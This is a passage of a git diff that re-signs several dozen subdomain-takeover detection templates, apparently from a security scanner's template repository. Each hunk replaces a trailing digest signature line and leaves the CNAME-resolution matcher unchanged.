4b0a00483046022100da69c3934ab685046db34fd5b530f9a94a05843b80c64b9bd0c124de5f99b3bc022100baeb8a7a60d2cc78907aa619a65bba8bfaff269182513a5260167813f14407bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/gohire-takeover.yaml b/http/takeovers/gohire-takeover.yaml index 73d2a646a9..129a90987e 100644 --- a/http/takeovers/gohire-takeover.yaml +++ b/http/takeovers/gohire-takeover.yaml @@ -34,5 +34,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a0046304402204f44da86889c616cf2b3196d930ed7be82e7776bf8c94b5c026d538b2ac1632a0220492bbc32c0310565248ae8cb06b828c52710ef50977055553862690c15381f93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022037b397c0657ab6c3ea60424bfe1551b5d4674a30c654fd687baee22a578595b2022051cd6752d29108a910e38993aea9fcb8b51bb6596d82f4f485cc8c21a81e939d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/hatenablog-takeover.yaml b/http/takeovers/hatenablog-takeover.yaml index 8a9ee5c09a..da60ab0204 100644 --- a/http/takeovers/hatenablog-takeover.yaml +++ b/http/takeovers/hatenablog-takeover.yaml @@ -31,5 +31,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100cccbda6f194b9c13e8d429fd19d5d99b9268c9ed3ac3886b5ca81a70bae502e5022100c63cbb05f231049af04acf8cdc226426618570036ed0b0b17b1ce7e576ab5acd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f1bd167e0d54c56419cfacf1f579b4a94ec793afcd2d71e41178d2c9911970f022100ea66618ec13a8f8f92c100bf9172d271c29ac6c890aebdec3a5745077d0549ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helpdocs-takeover.yaml b/http/takeovers/helpdocs-takeover.yaml index 75928be65a..6e2987827d 100644 --- a/http/takeovers/helpdocs-takeover.yaml +++ b/http/takeovers/helpdocs-takeover.yaml @@ -33,5 +33,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100d14a2588e716661e039af2e59ffb3bbea00f668324088aee429b9de8b8f1811802202d413b89505505d9e46a2f08ee2ee2896d802b983c85a4fa66c8ce1851b77040:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220482c6b083ccbabb1e2158009605bfe5dcbccf91764b760ebdaf751144015b6db022038fc8950954039feeb1f93f637a0bc96e0e5c1f248fdfc15d231bd01ec86e675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helpjuice-takeover.yaml b/http/takeovers/helpjuice-takeover.yaml index df1b6ea532..ec269613db 100644 --- a/http/takeovers/helpjuice-takeover.yaml +++ b/http/takeovers/helpjuice-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100f6cc8d12b3d37ce071d0f0991b48a2cde1418c6306fdaff878e637d95da5c809022100ea84154d67d1ef86b4ba76171d91b9f7869dc5d291e7aa44cb168dcb38fc0178:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a35d9fdeea4128eb38c04dea1b5d3693810c966a13e599dcc2be949fe36554820221009a7e1fa76dcfb51b1c2fe04202c129cf7b893465f48049feccaeb79258a0a366:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helprace-takeover.yaml b/http/takeovers/helprace-takeover.yaml index 815cc43c5e..6201edd5b8 100644 --- a/http/takeovers/helprace-takeover.yaml +++ b/http/takeovers/helprace-takeover.yaml @@ -31,5 +31,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a0047304502210087860d3c24c0e128ed5238827375c4ab06496c1780dee8ce4dd39a7906ca0ae00220710d80043d511d5517f1bc91d5d85a543306e03b08dcfc32c1fa85dd555fdf9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022027d08153b33fe40911fd49617721948492c62cc3d3d544c406599e8961424af5022100943309fe155a4cf41828089ec841eaeadb44e39a7e7c66113725e3eb40bf14e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/helpscout-takeover.yaml b/http/takeovers/helpscout-takeover.yaml index a11159e4ff..35568e8bfb 100644 --- a/http/takeovers/helpscout-takeover.yaml +++ b/http/takeovers/helpscout-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100f82db3b5d07dfbfb6f11abb9f0abc7a1991698b51abcdbe03bc6b13f41d7710b022017ff27474089ced18f311f6798e2ed903d149f3da6ccd0efd91bab91c6c4d21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a14491277e022059a4d27c53642a673066e07741fc8df713ef9fca58978f2036022100a50455f2613321de05c5f0d730176a9d9edaef962b414b6dd344438c18b8c47d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/hubspot-takeover.yaml b/http/takeovers/hubspot-takeover.yaml index 7846134595..4f9339ee79 100644 --- a/http/takeovers/hubspot-takeover.yaml +++ b/http/takeovers/hubspot-takeover.yaml @@ -33,5 +33,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100a15863236633756d1edb190b798d1e8a6f4d6f5babf13f4f5556048598473beb02201f67a22838abed7e84f98d3f1ea74c297833e39784aac4808c60baa6d7957b0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206ce71ca779690190161ec883a0f6a10d9d38905219eba277ea6dfb04d7466cd4022027eb6f3bd3010a4a5d68befc5b652eac733f20cefb5f1f9019d1f5020f40e148:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/intercom-takeover.yaml b/http/takeovers/intercom-takeover.yaml index 37d8705d10..25e1528295 100644 --- a/http/takeovers/intercom-takeover.yaml +++ b/http/takeovers/intercom-takeover.yaml @@ -32,5 +32,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a004730450221009d1ef63eb341e158cc4d429a755e07147b7a1df890918864db4d508b28d5647d02202f93b47c9dfc0376a95d3eaf020e73ebfed0a3ca5dcaccc0012fe4e1265b5d14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009aef81a7fc6a59a2ba6de62e3772517f8c0dd2b1fb2c9c7cd325f9a7bea24645022100c585d84759bd8e0084076b7b4f684e29e878e894f643e4a16f0ec7c17ddf2b6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/jazzhr-takeover.yaml b/http/takeovers/jazzhr-takeover.yaml index 7178555184..1c9c75eeff 100644 --- a/http/takeovers/jazzhr-takeover.yaml +++ b/http/takeovers/jazzhr-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a004730450221008f8a526afe19043f972676b23a0ad16e3eb20d1fd15d567f85aa4c69af7490a40220174307601261325b2c937087854fdcaaf5e8f5ece73f6b1295e4e1cc83ae6777:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022029f3b863ed50f24393d86e83c928ff07f9eb39bdeefdcd9093120debbfcdf049022100a00a29f9bd49422c3ee702f888dedd6d166e73eee1b56732cff1e8939c938b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/jetbrains-takeover.yaml b/http/takeovers/jetbrains-takeover.yaml index 7d95fcce4c..bb54068f8b 100644 --- a/http/takeovers/jetbrains-takeover.yaml +++ b/http/takeovers/jetbrains-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a0048304602210081c1d412bdc5f9e45cd525b55171816a1ebd0e7c9d36e938bb57b441fe76edde0221009edfcf6086e6d9917073aa89ae5973b6b44be71db9e20919edb8a67f8f135a54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e36ff70f8a0907caca607574e3bba5cdf53e03b530dfc7418b8dd26746b6b3c02203a03022c7dd004ea62891eeda1133a8bbb4cf7596d269f047d4f2b5abe6d921f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/kinsta-takeover.yaml b/http/takeovers/kinsta-takeover.yaml index 4b9bf843f8..bf27514292 100644 --- a/http/takeovers/kinsta-takeover.yaml +++ b/http/takeovers/kinsta-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a0047304502206044400efee80464021a449f3f2b0c26398e6453922d5d91170853fe77e53392022100b72b2fe2baa52138448d8b0be94b1ee244c1d373065cad601ef8d2566b5f1de4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c1180edbebb878f2804b827537d695ea36e9d3cab087819d029d1e89230fae4302203cd91b5cdc16051046d223660b4487a540a298336b4347f0e7c03f56cef75d73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/launchrock-takeover.yaml b/http/takeovers/launchrock-takeover.yaml index 2aa98cacae..b42c9d55ee 100644 --- a/http/takeovers/launchrock-takeover.yaml +++ b/http/takeovers/launchrock-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a0048304602210090dbe87f01c8309c771d28afa1d230137e25756c084b12ab3c7122b2a7630261022100a85fe10454d6207a146bd59f225234643f5da44be48fd4495dca47a8646d9fc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024aad780c453db09ec0aa72dc5d26dd07ea0307eefb7cbd8ad014380bfeca9d7022100ede17fb171220b83769a563fa26398d7be46bd50363522e38f008bb2b15c8cc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/leadpages-takeover.yaml b/http/takeovers/leadpages-takeover.yaml index ff3931e779..36d66f2b0c 100644 --- a/http/takeovers/leadpages-takeover.yaml +++ b/http/takeovers/leadpages-takeover.yaml @@ -35,5 +35,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a0047304502200dd0c65ea9c1bde329bbbbc48da6968bd7a8764db818f4b0b2662aa5f90cbcad0221009333f1d86ecbe74e5a099b1f2851f72ce7a74d2733da0c9813bd1c2e502707a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7abea52b53bc6e3b854fe480b6ceddf1d28a773c7cb45b063cb84894dce86df0220023489a7dfa027e01a533d41eb0242aa9c7693238d060be9e9546e468c6b7c93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/lemlist-takeover.yaml b/http/takeovers/lemlist-takeover.yaml index c964774f28..bab53dabe3 100644 --- a/http/takeovers/lemlist-takeover.yaml +++ b/http/takeovers/lemlist-takeover.yaml @@ -34,6 +34,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - - -# digest: 4b0a0048304602210099908eacc7046289b5a30398972ec745cf09ab068ece8b8538ba44ddb5dd35a7022100d072f3859b82c4cda35df540e8a0fa3f30480d8d0a26634ee55eb5fb2c9d71fe:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b12fa0b4978f85ed3cbe41639ef1128582cc49f9cbdf4a80f3a5bdb0be0bee31022045c0a3b23c1b9d3d1ef6be6d6259807aecab1191bf352df7c7f035044e3c5497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/mashery-takeover.yaml b/http/takeovers/mashery-takeover.yaml index dbb0dacb6a..d04590f260 100644 --- a/http/takeovers/mashery-takeover.yaml +++ b/http/takeovers/mashery-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a004630440220750d4b0e60b943b940f6294035333c6aab7d5991a49b76cd9781c5143141aa7a0220064abdac1cfa23c8e64075bb9c8eb3660c2ee351f051877cfdd4bd704c0c4d0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201149e8f9fc9b0d0351c9ad314e60423a0868e8fae542b3a1ac7993dba931ef1d0221008049d9334895aef36c83670111facb54c8a21f0d0c0fda7ac1fab4f2a5238075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/meteor-takeover.yaml b/http/takeovers/meteor-takeover.yaml index 1928245b3e..30a7c0ff72 100644 --- a/http/takeovers/meteor-takeover.yaml +++ b/http/takeovers/meteor-takeover.yaml @@ -26,5 +26,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a004630440220106fbac97760646029437a8745d2c52c78542cf9bfe774465264cbd0c3bd272b02200d06849853bdb1d987dae68ca4f28585ee62c27c4e3edbd6d2639ef754f75af0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dd786b650d96f7b610f6fabb775fb0a1bdbdc399098915fed785dc96c4096290022100efa3ad374411b3b54f0901c2147f72f158c6e217fcf25d1ecc77b2ad9a38a28f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/netlify-takeover.yaml b/http/takeovers/netlify-takeover.yaml index 65be0aeabc..c8ab4ed7bc 100644 --- a/http/takeovers/netlify-takeover.yaml +++ b/http/takeovers/netlify-takeover.yaml @@ -39,5 +39,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a004730450221009a5a121d786fe47e6abfdf7b52f451237d696d19fa9df212b83dab270e03509b0220481f0dfdf70ae43cf23a05b969ad56aedcbb2f3f202d208b5b911e54342eb00c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204764f51efe7fea4b2004ff43b29b32c53238303e8951f73f30fbf6bd76e1e7b8022100cb22252706a3c243c470c662f9f71fa85726f93f718d7fe53b3e5147a828750b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/ngrok-takeover.yaml b/http/takeovers/ngrok-takeover.yaml index 0e23589bf1..4f2bf624ce 100644 --- a/http/takeovers/ngrok-takeover.yaml +++ b/http/takeovers/ngrok-takeover.yaml @@ -31,5 +31,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a004830460221008cf6a9807fc46be1355a7147dccd0eb9da046a96308c2f7ec21d020634e17c7002210084a3569ad587a666c3f615fc707f8efaaec9c5ce7ad73bd0720b3da2b25e65ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100be3ad2b3fe9c69371245fb062c73d6fef40199eed88340cee28ff023664fa76202203c6a116f08d99806c26409d9284df5ac6c93e5c5886bb79b8824e8e641c55d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/pagewiz-takeover.yaml b/http/takeovers/pagewiz-takeover.yaml index d25de8b47b..f5c7986332 100644 --- a/http/takeovers/pagewiz-takeover.yaml +++ b/http/takeovers/pagewiz-takeover.yaml @@ -33,5 +33,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a004730450220438d742994d111e4fa56adb384f11133af7019c3faf6ca8c6d8a634a3e591260022100d7bf8ba3814fab3b200485663be1161f0d6a8ad33224bd486730ec0f7bfed45e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100934d069e3bf75bd8206fbf531673a2d73e303c35f6a572ba6086c22a1f7b1ab402204e9b7508bb47942f8d3575b0284ca41734db910ce460d81cb9a1604d6c9a00db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/pantheon-takeover.yaml b/http/takeovers/pantheon-takeover.yaml index 388d3e438a..3febab9dae 100644 --- a/http/takeovers/pantheon-takeover.yaml +++ b/http/takeovers/pantheon-takeover.yaml @@ -35,5 +35,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100eb34ca91df59d23692e3ef0fa3a62e217b7320372b4e58dc7e1877ac65dae3b50220168496114bc754b3dfd3a66b6d92331f74517a0266fd3cf7853523445a18136e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008c7dd4e22a1d4fde29ea63656635b7adbc8f5abf044130945e4a69df607215c00220629314f1d78cd8df1bde642f05b1febd922fd801bfbf4e5980a29defe2a57e69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/pingdom-takeover.yaml b/http/takeovers/pingdom-takeover.yaml index ee4ff07a60..16006c7910 100644 --- a/http/takeovers/pingdom-takeover.yaml +++ b/http/takeovers/pingdom-takeover.yaml @@ -31,5 +31,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100afda4c99e426c70cabf279d2bd2ba47c066c1865232547806d4e7cc14228c927022100a8a67314e0aa40fd5666e734ef69b3fbd1288225afa7ed3911add364adc54600:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b2bc3e8ad65a671ca4425f64dd44280a4809d55718706a6f6f005a5ee28d7420022100a00a7a1e403a95d522aa6fbe0fc30e92505eac559c53a8503cbb574c6b5e32af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/proposify-takeover.yaml b/http/takeovers/proposify-takeover.yaml index 350794754d..d1057f9a6a 100644 --- a/http/takeovers/proposify-takeover.yaml +++ b/http/takeovers/proposify-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100dcd0362df06ad3d224b52f3905afa42f8d0fd9325b3815b7068d7345f25c37ba022100e0cc8b3fc0073e42516de82fd4eb79b4735ef72a3c9635843cd7e983c559b0ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022034258f2fca01e39007e9d33458f41536b1903c50ed5ddacba8805bfded9c10b80220441b9f318c24301fdeaf66b9e1fe593a01aa1988cbb0b3fed8fd2c456336a667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/readme-takeover.yaml b/http/takeovers/readme-takeover.yaml index d54b57a651..9462227e2f 100644 --- a/http/takeovers/readme-takeover.yaml +++ b/http/takeovers/readme-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100934f29d16e67282ea4584c2cdb6aa86cef2e6acfcf2b7360c7c95a56af079755022020197632f0b09941f102ff281691c6badfdfe1bd218fd9f11a1378fb0948ed36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ce949e30e457000311f37d3f507775ffb4ad50c2b614cf12956ce4e7805bf313022100a1f155c7443b863e38dbe30ba9b02e94aa7504be85e029d837887d7c25d2a045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/readthedocs-takeover.yaml b/http/takeovers/readthedocs-takeover.yaml index 230f2e56ec..61665cd327 100644 --- a/http/takeovers/readthedocs-takeover.yaml +++ b/http/takeovers/readthedocs-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100b33497bd5d29e727bd5b2dee2741f81c3cd678f67ce496862009f03491c74a1402200c0a2e755d30c7ae368ba919cec855cd8776da7edb32b2f23b09f8e76d44ea03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b73bb8a1171ae52b384c6eb817ed2be50e3e243f754c2f19806a5d4ae45a35f02205fd4870a807fb475b6e1322e6135385950d8b1ecca8e5fbfcea83c1b364362a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/shopify-takeover.yaml b/http/takeovers/shopify-takeover.yaml index 4e8a63023e..293699db8a 100644 --- a/http/takeovers/shopify-takeover.yaml +++ b/http/takeovers/shopify-takeover.yaml @@ -46,5 +46,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a004730450221008da05517cfb242d1242e3366300e8d39df5723c33041620c06f99af3347c58d002206e4e69f6968bf7fe0137d469ec299a7bf03bf2b5f58f7a3760e21bff906223a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220204856f7e988020fdcb4ae366636d5955319303a33a7b6e83099bef036aa4c72022100b0d493e583dcb4b1d9db9197368a4405bef1b303b74fcc3abe8b99fe13ff46e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/short-io.yaml b/http/takeovers/short-io.yaml index 1e3cd98286..6a800246ac 100644 --- a/http/takeovers/short-io.yaml +++ b/http/takeovers/short-io.yaml @@ -32,5 +32,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100d0e5e5b71767ee8aaaa8d8ef6477dab2f50fed729807e4c14167889f652518e102210083d46341f8300d1bb8c48391d24b12950470f7cdc12d6a403bda413362432256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200547045a93bd650f749334f481c7e85b6b70c5bda668debc7edc236f405f2170022022336404658166b4297713e33a77f79de3c3cca8f25630301b2e4c90b2778c7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/simplebooklet-takeover.yaml b/http/takeovers/simplebooklet-takeover.yaml index 40ba5a8e9b..9f0bfbdf57 100644 --- a/http/takeovers/simplebooklet-takeover.yaml +++ b/http/takeovers/simplebooklet-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100d379bb62e1918dbe1c7da51210a9fc78c13eece51503c29cb71860a01eb735b602206884dd42bc3f71c2f6d4043439024fca4d476b9c34458d1e0ad192e9e7b54f61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec8a2d5fa51dea56e883426cf67a8d347db6169360c9336c06f36bf5f09efede022100f5157c422980294a6369eaf2c985ae49681e7a1438c5ee44e4b42497bed2b161:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/smartjob-takeover.yaml b/http/takeovers/smartjob-takeover.yaml index 46a8ffaf36..81927b2c17 100644 --- a/http/takeovers/smartjob-takeover.yaml +++ b/http/takeovers/smartjob-takeover.yaml @@ -32,5 +32,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a00463044022049c3138d38ce6c96f3636124f2b2a35ecab7822c53ff156452157313d00b716a022009ed4801471c1fc944d902ea91541670c2bca9470c2fb81e149dff87a5b02b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206d2af6a49847e8d78c4804f876d0ccda8d71bdbe74d91a0a9d3e9c074428b07c022100e95814e3f5de541f6c2a0da04d93f11fb16fcd17a1db33c638d383e6ff9d9e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/smugmug-takeover.yaml b/http/takeovers/smugmug-takeover.yaml index d4707db9d9..c8d469ccbb 100644 --- a/http/takeovers/smugmug-takeover.yaml +++ b/http/takeovers/smugmug-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a0046304402203f4770f8a1f7362fdd2191c47eebe79f4ee07650c68bef4124ea2a79b8e9e47402200bb66b165626620135c8a0de6d3bc0606a67e47abbc01b42898333d03ae0cf1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b1226725e7147551cc8b60993b4c27b9404d7c216e70d947284e74f11f59f0b402200d4046e85887737a8f83988735889b386beaed3dc3011dd2832b5a038810ee4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/softr-takeover.yaml b/http/takeovers/softr-takeover.yaml index 72c144d11e..2984a73259 100644 --- a/http/takeovers/softr-takeover.yaml +++ b/http/takeovers/softr-takeover.yaml @@ -36,5 +36,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a0047304502201d900ebfa70bd8f26a199b76f610632623ce88a5846803b3f3bd77a422484117022100f9a6b0cffd9921d7216622ab4d51e348889b1a79a9cc10f9cd8111afa77bbf41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f773bd5a97c78de8be263cdf809ec456f7c2eb6b32f2486fb1e61a99d2cd51fb02201bfdd4f5a49437f0edcee10f3c62c501e26f12289b66e2ceb03200b2c14511c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/sprintful-takeover.yaml b/http/takeovers/sprintful-takeover.yaml index 5d679c9056..ed94c816dd 100644 --- a/http/takeovers/sprintful-takeover.yaml +++ b/http/takeovers/sprintful-takeover.yaml @@ -39,5 +39,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 490a00463044022052c4d55ecb28b529b3d7c47a42a7bc5144d2e96c184ed2f0a931178a2e7244f602206c0d64bddfb174e41ab4935bfa3f3136efb8d37d33d66d3183dd46eaf849c513:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202faae6dd1e1075349daf0b9382c13500e2c12d16a131791a95c98e025a80543202200a4d444f499455ad564b5cf9be22d31ce9e001595e92ab77b2b91e4160940d36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/squadcast-takeover.yaml b/http/takeovers/squadcast-takeover.yaml index a44e0cc136..b457b6b542 100644 --- a/http/takeovers/squadcast-takeover.yaml +++ b/http/takeovers/squadcast-takeover.yaml @@ -38,5 +38,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022073e3651947c403258a6376ad586534893f46abfcd2d9728c1d0edbeab2ff2be4022100f20a52cd2ab0ea4a4ebeabc28511e0ccb3aaaebffaac719e499d3662b7a127e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009bd4e2c96f378728a169b30d9f8dbb6709bb0b212fd48297c86d27d05bf8e6e0022100b8618a8aa2e41507730211937599b02a39cce1b8662ae0da5f0ea632ee222517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/strikingly-takeover.yaml b/http/takeovers/strikingly-takeover.yaml index 6bd97e1e22..91d82b721e 100644 --- a/http/takeovers/strikingly-takeover.yaml +++ b/http/takeovers/strikingly-takeover.yaml @@ -33,5 +33,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100fd7a1661a98893ad578e0b9827ec85416a438c34c8af9f9eca4811cbc742efc3022100e4d9c870f2d602476dcabc0e533cd958e0c2fb5483e81beba34316d149563602:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e5d298567c427fc0d1a199cbb2634c5fdc7f11b95dad2657d2314b3675056e5022100d08db1a81efc9de0013e99f5968cb948ee6cca04c57c331bd6aa6d23d194a859:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/surge-takeover.yaml b/http/takeovers/surge-takeover.yaml index 4cc427eb29..0d2a016cb3 100644 --- a/http/takeovers/surge-takeover.yaml +++ b/http/takeovers/surge-takeover.yaml @@ -34,5 +34,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a004730450221008687ea9c91087816fda6cde6f2654de22d64f00f4452d3c150919a3d02c09d80022010aceb815c267cd65a6a2d4a9e2632b00ab2724596e2edaa4f816b872406f809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c5e76f50cc351a887ab8bbbc9256b132fc7fd3ce128f1107cfa8a3566a8ade57022100bc48b903cb92bea6c0303e77b1d142eacd8dcd1edb4466bc76781f82e171a7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/surveygizmo-takeover.yaml b/http/takeovers/surveygizmo-takeover.yaml index 44dee26303..4461ec40bf 100644 --- a/http/takeovers/surveygizmo-takeover.yaml +++ b/http/takeovers/surveygizmo-takeover.yaml @@ -30,5 +30,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4a0a00473045022100d848c1222e65f12a28e0e34840a126a71a103b5f06eaa2d6b9b2bfcc0bca00c0022074e9a9958b785a215ddea9755598098e3e1457277ddd97db0ff9b6f92cea1ce8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204ac3696d5bb6b669b0d7fd8ac6603a2cc19d89b9f5cf468b9c212938ea1886dc022100c8c75e133f38a8a81eef8cea037b689be65102e87094287ac76f6db0aff68f22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/takeovers/surveysparrow-takeover.yaml b/http/takeovers/surveysparrow-takeover.yaml index 78f774ad78..57e2850c03 100644 --- a/http/takeovers/surveysparrow-takeover.yaml +++ b/http/takeovers/surveysparrow-takeover.yaml @@ -33,5 +33,4 @@ http: - type: dsl dsl: - "resolve(Host, 'cname')" - -# digest: 4b0a00483046022100ff4d63e33b67fb2ff21325b11008922a19e3bad15fead71e40a2168fef4b34e3022100bb737388806f6773e498a74f759fe708048d904fe6600f668ba726af4f883332:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5d612e8edd2e7e0be76838eafb7fc5255b09b098f6a5984d80674fae34dbec702202ded396f540ff22e864c5c7584feea766ed7c012d225ff0b6854e487d4368e6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 